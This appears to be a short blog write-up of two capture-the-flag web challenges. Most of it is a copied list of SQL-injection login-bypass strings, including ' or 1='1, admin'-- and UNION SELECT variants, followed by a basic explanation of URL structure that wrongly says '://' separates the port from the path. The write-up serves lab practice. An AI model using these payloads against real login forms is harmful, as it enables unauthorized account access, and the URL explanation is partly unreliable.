easy sql
1.进入靶机
2.然后,先进行简单的sql注入
sql注入有
3.万能密码进行尝试,获取flag
重点:万能密码
sql注入之万能密码总结_sql万能密码_echokp的博客-优快云博客
' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1
have fun
1.进入图形界面后,可以查看网页源代码
进行代码审计,然后发现如图的地方我们可以进行进一步不的探索
2.在url框中,实现
重点:url
查询资料:
URL的概念与组成_url组成_小宝的宝呢的博客-优快云博客
1.url由四个部分组成
协议、主机、端口、路径
协议(HTTP):规定数据传输的方式
域名(IP):在网络环境中找到主机-------用 :// 与协议分隔开
端口(port):(常省略)在网络主机上,标识一个进程(应用程序)------用 : 与域名分隔开
资源路径:标识网络资源(文件,图片,音视频,变量...)------用 :// 与端口分隔开
查询参数:传递给资源路径对应的数据------用 ? 与资源路径分隔开,查询内部参数用 & 分隔多个键值对;当没有资源路径时,可以默认是 / ,在各个网站通常有默认的路径如index.html
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
